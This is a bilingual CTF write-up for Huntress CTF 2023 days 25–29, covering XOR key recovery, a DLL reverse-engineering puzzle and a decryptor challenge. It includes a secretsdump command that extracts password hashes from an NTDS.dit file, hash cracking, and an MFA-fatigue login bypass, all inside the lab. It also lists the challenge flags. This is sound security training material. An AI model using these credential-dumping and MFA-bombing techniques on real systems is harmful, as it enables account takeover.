Huntress CTF 2023 — Write-up
I mean it. 我说真的。

The note is more important than you think. It mentions “military-grade encryption” which is a meme term for XOR encryption. Additionally, there are some well-known files encrypted, like the Windows XP background image and the entire text of Hamlet.
这张纸条比你想象的更重要。它提到了“军用级加密”,这是异或加密的模因术语。此外,还有一些众所周知的文件被加密,如Windows XP背景图像和哈姆雷特的整个文本。

A quick lesson on XOR is in order. The XOR operation takes an input and a key to produce an XORed output.
关于XOR的快速课程是有序的。XOR 操作采用输入和键来生成 XOR 输出。

input_string ⊕ key = “xored_string”
input_string ⊕键 =“xored_string”

The trick to this challenge was the fact that XOR of the input_string and the “xored_string” results in the key:
这个挑战的诀窍是input_string和“xored_string”的异或导致密钥:

input_string ⊕ “xored_string” = key
input_string ⊕ “xored_string” = 键

This means we could obtain the key by doing the XOR operation between an encrypted file and its original. Thankfully, the challenge had a bunch of well-known files you could use as an original. I used this Windows XP background image combined with the following Python code:
这意味着我们可以通过在加密文件与其原始文件之间执行异或操作来获取密钥。值得庆幸的是,挑战赛有一堆众所周知的文件,你可以将其用作原件。我将此 Windows XP 背景图像与以下 Python 代码结合使用:

import sys #check if this is needed

file1 = bytearray(open('./Bliss_Windows_XP.png', 'rb').read())
file2 = bytearray(open('./Bliss_Windows_XP.encry.png', 'rb').read())

size = len(file1) if len (file1) < len(file2) else len(file2)
xord_bytes_array = bytearray(size)

for i in range(size):
  xord_bytes_array[i] = file1[i] ^ file2[i]

print(xord_bytes_array)

The output of the script was the key, which, when used with the decrypt tool resulted in the flag. The key was cosmoboi .
脚本的输出是密钥,当与解密工具一起使用时,该密钥将生成标志。关键是 cosmoboi .

The flag was: flag{092744b55420033c5eb9d609eac5e823}
标志是:flag{092744b55420033c5eb9d609eac5e823}

This concluded day 25. 第25天就此结束。

Day 26 第26天

The day 26 challenge was:
第26天的挑战是:

  • MFAtigue

The challenge provided you with an NTDS.dit file and a SYSTEM file. I was able to extract user hashes using impackets secretsdump with the following syntax:
质询为您提供了 NTDS.dit 文件和 SYSTEM 文件。我能够使用以下语法的 impackets secretsdump 提取用户哈希:

impacket-secretsdump LOCAL -ntds ntds.dit -system SYSTEM -outputfile creds.txt

This resulted in several hashes, which I threw into CrackStation to see if I’d get someone’s password.
这导致了几个哈希值,我把它们扔进了 CrackStation 中,看看我是否会得到某人的密码。

Huntress CTF 2023 — Write-up
Crackstation returned the password for one hash.
Crackstation返回了一个哈希值的密码。

The password belonged to the JILLIAN_DOTSON user. Logging in with the username and password prompted for MFA. I remembered the Uber compromise, where attackers bypassed MFA by repeatedly sending MFA messages until the user was overloaded and accepted one such request.
密码属于JILLIAN_DOTSON用户。使用提示进行 MFA 的用户名和密码登录。我想起了 Uber 的妥协,攻击者通过反复发送 MFA 消息来绕过 MFA,直到用户过载并接受一个这样的请求。

Sending multiple MFA requests was the correct path, and once logged in the flag was displayed.
发送多个 MFA 请求是正确的路径,登录后会显示该标志。

Huntress CTF 2023 — Write-up
You can also make the connection between the challenge name and the correct path.
您还可以在挑战名称和正确路径之间建立连接。

The flag was: flag{9b896a677de35d7dfa715a05c25ef89e}
标志是:flag{9b896a677de35d7dfa715a05c25ef89e}

This concluded day 26 第26天结束

Day 27 第27天

The day 27 challenge was:
第27天的挑战是:

  • Crab Rave 螃蟹狂欢

The challenge consisted of a shortcut file and a dll. The shortcut file would trigger the dll.
挑战由一个快捷方式文件和一个 dll 组成。快捷方式文件将触发 dll。

Huntress CTF 2023 — Write-up
Result of the strings command.
strings 命令的结果。

The DLLMain function contained only the NtCheckOSArchitecture function.
DLLMain 函数仅包含 NtCheckOSArchitecture 函数。

Huntress CTF 2023 — Write-up
DLLMain as seen with Ghidra.
DLLMain 与 Ghidra 一起出现。

The NtCheckOSArchtirecture, in turn, contained the following code:
反过来,NtCheckOSArchtirecture 包含以下代码:

Huntress CTF 2023 — Write-up
We see a call to litcrypt_internal::decrypt_bytes.
我们看到对 litcrypt_internal::d ecrypt_bytes 的调用。

The function used in this code block is implemented in this repository. The function performs an XOR operation using an input and a key:
此代码块中使用的函数在此存储库中实现。该函数使用输入和键执行 XOR 运算:

Huntress CTF 2023 — Write-up
Military grade encryption.
军用级加密。

Looking back at the disassembly, it would seem that the data inside the pointer to DAT_103cd938 and DAT_103cd946 is XOR’ed with the key rr5-rr5-rr5-rr5-rr5-rr5-rr5-rr5-rr5-rr5-rr5-rr5-rr5-rr5-rr5-rr5-r .
回头看反汇编,似乎指向 DAT_103cd938 和 DAT_103cd946 的指针内的数据是用键 rr5-rr5-rr5-rr5-rr5-rr5-rr5-rr5-rr5-rr5-rr5-rr5-rr5-rr5-rr5-rr5-r 进行异或运算的。

Huntress CTF 2023 — Write-up
The data inside the two pointers.
两个指针内的数据。

Taking the data and putting it into CyberChef results in the following:
获取数据并将其放入 CyberChef 中会得到以下结果:

Huntress CTF 2023 — Write-up
M.yeomans30801 could be a username.
M.yeomans30801 可以是用户名。
Huntress CTF 2023 — Write-up
And this could be a hostname.
这可能是一个主机名。

The binary seems to check if the username and hostname match the username and hostname of the executing machine. To check the theory, I changed the hostname of my FlareVM by opening Settings (Windows + I) -> System -> About -> Rename this PC and changed it to WIN-DEV-13 .
二进制文件似乎检查用户名和主机名是否与执行机器的用户名和主机名匹配。为了验证理论,我通过打开“设置”(Windows + I)->系统->“关于”->重命名此PC并将其更改为 WIN-DEV-13 。

Additionally, I created a new user by going to Settings (Windows + I) -> Accounts -> Other users -> Add account. When adding the account select I don’t have this person’s sign-in information, and Add a user without a Microsoft account. The username for the new account was m.yeomans30801 .
此外,我通过转到“设置”(Windows + I)-“>帐户”-“>其他用户”-“添加帐户”>创建了一个新用户。添加帐户时,选择“我没有此人的登录信息”和“添加没有 Microsoft 帐户的用户”。新帐户的用户名是 m.yeomans30801 。

Logging in as that user and running the dll with the following command:
以该用户身份登录并使用以下命令运行 dll:

rundll32.exe ntoscheck.dll,DLLMain

resulted in a notepad process spawning and a message box appearing with the flag.
导致记事本进程生成,并出现一个带有标志的消息框。

Huntress CTF 2023 — Write-up
The flag. 旗帜。

The flag was: flag{225215e04306f6a3c1a59400b054b0df}
标志是:flag{225215e04306f6a3c1a59400b054b0df}

This concluded day 27. 第27天就此结束。

Day 28 第28天

The day 28 challenge was:
第28天的挑战是:

  • Snake Eater II 食蛇者II

For this challenge I’d advise you look at the write-up made by GoProSlowYo here.
对于这个挑战,我建议你看看GoProSlowYo在这里写的文章。

Shout out to Taggart as he was the one to solve this for our team.
向 Taggart 大喊大叫,因为他是为我们的团队解决这个问题的人。

Day 29 第29天

The day 29 challenge was:
第29天的挑战是:

  • BlackCat II 黑猫 II

This challenge was an advanced version of the previous BlackCat challenge. The challenge consisted of a decryptor and a bunch of encrypted files, one of them being the flag.
本次挑战是之前 BlackCat 挑战的高级版本。挑战包括一个解密器和一堆加密文件,其中一个是标志。

The decryptor was written in C#, so I opened the file in dnSpy and found the following code:
解密器是用 C# 编写的,所以我在 dnSpy 中打开了文件并找到了以下代码:

// Decryptor.DecryptorUtil
// Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250
public static void DecryptFiles(string directoryPath, string decryptionKey)
{
    string[] files = Directory.GetFiles(directoryPath, "*.encry");
    if (files.Length == 0)
    {
        return;
    }
    string text = null;
    foreach (string text2 in files)
    {
        string text3;
        if (text == null)
        {
            text3 = decryptionKey;
        }
        else
        {
            text3 = DecryptorUtil.CalculateSHA256Hash(text);
        }
        string text4 = Path.Combine(directoryPath, Path.GetFileNameWithoutExtension(text2) + ".decry");
        DecryptorUtil.AESDecryptFile(text2, text4, text3, DecryptorUtil.hardcodedIV);
        text = text4;
    }
    Console.WriteLine("[*] Decryption completed.");

The code would use the sha256 hash of the original file as the key. This meant I had to find the original files, and after a lot of search I found the following website https://www.atxfinearts.com/blogs/news/100-most-famous-paintings-in-the-world .
该代码将使用原始文件的 sha256 哈希作为密钥。这意味着我必须找到原始文件,经过大量搜索,我找到了以下网站 https://www.atxfinearts.com/blogs/news/100-most-famous-paintings-in-the-world。

I downloaded the images by right-clicking on the image and Save As . I saved them with the following extension and type:
我通过右键单击图像和 Save As .我使用以下扩展名和类型保存了它们:

Huntress CTF 2023 — Write-up
I didn’t test if the image needed to be saved like this, I did it just so the original would have a .jpg extension.
我没有测试图像是否需要像这样保存,我这样做只是为了让原始图像具有 .jpg 扩展名。

Finally, I calculated the sha256 hash of the first picture loaded by the program.
最后,我计算了程序加载的第一张图片的 sha256 哈希值。

Huntress CTF 2023 — Write-up
An00bRektn had already found the order in which the files were loaded.
An00bRektn 已经找到了文件的加载顺序。

Inputting the sha256 hash of the first image as a our password resulted in a successful decryption.
输入第一张图像的 sha256 哈希值作为我们的密码导致解密成功。

The sha256 hash was: sha256 哈希值为:

80d60bddb3b57a28d7c7259103a514cc05507c7b9cf0c42d709bdc93ffc69191
Huntress CTF 2023 — Write-up
We get a note that files are decrypted, let’s check.
我们收到一个文件已解密的注释,让我们检查一下。
Huntress CTF 2023 — Write-up
And we got the flag.
我们拿到了旗帜。

The flag was: flag{03365961aa6aca589b59c683eecc9659}
标志是:flag{03365961aa6aca589b59c683eecc9659}

And with that, the final challenge is done.
至此,最后的挑战就完成了。

Conclusion 结论

It was a fun month, learned a lot from the team and the CTF. My only criticism would be to reduce the duration of the CTF since after 30 days you start to feel fatigued. All in all, thank you for the great CTF Huntress Staff, and thanks to the great people who were with me in the team. I’ll be taking some well deserved rest now.
这是一个有趣的月份,从团队和CTF中学到了很多东西。我唯一的批评是减少 CTF 的持续时间,因为 30 天后您开始感到疲劳。总而言之,感谢 CTF 女猎手的出色员工,也感谢团队中与我在一起的优秀人员。我现在要好好休息一下。

 

原文始发于Echo_Slow:Huntress CTF 2023 — Write-up

版权声明:admin 发表于 2023年11月25日 下午10:36。
转载请注明:Huntress CTF 2023 — Write-up | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...